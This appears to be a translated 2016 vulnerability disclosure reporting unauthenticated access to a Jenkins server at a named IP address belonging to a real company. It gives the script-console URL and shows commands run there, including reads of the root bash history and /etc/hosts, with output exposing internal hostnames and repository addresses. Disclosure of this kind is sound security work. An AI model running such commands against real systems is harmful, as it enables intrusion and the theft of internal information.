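2016-03-10: Details reported to the vendor; awaiting vendor response
2016-03-10: Vendor confirmed; details disclosed to the vendor only
2016-03-20: Details disclosed to core white hats and experts in related fields
2016-03-30: Details disclosed to regular white hats
2016-04-09: Details disclosed to intern white hats
2016-04-24: Details disclosed to the public
As the title says.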
https://119.29.69.210/
Vulnerable address: https://119.29.69.210/ (Jenkins unauthorized access)
Command execution URL: https://119.29.69.210/script
hostname
tx-ty-mesos-slave-003.tx.tingyun.com
cat /root/.bash_history
Partial content:
git clone [email protected]:netop/tingyun-common-centos.git:10222
#1453789283
git clone [email protected]:netop/tingyun-common-centos.git:10022
#1453789836
git clone [email protected]:netop/tingyun-common-centos.git
#1453789842
vim /root/.ssh/known_hosts
#1453789847
git clone [email protected]:netop/tingyun-common-centos.git
#1453789851
vim /root/.ssh/known_hosts
#1453789855
ll
#1453789857
git clone [email protected]:netop/tingyun-common-centos.git
#1453789862
ll
#1453789865
cd tingyun-common-centos/
cat /etc/hosts
ifconfig -a
Jenkins unauthorized access
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-03-10 11:57
Test system. Confirmed; fix in progress.
None yet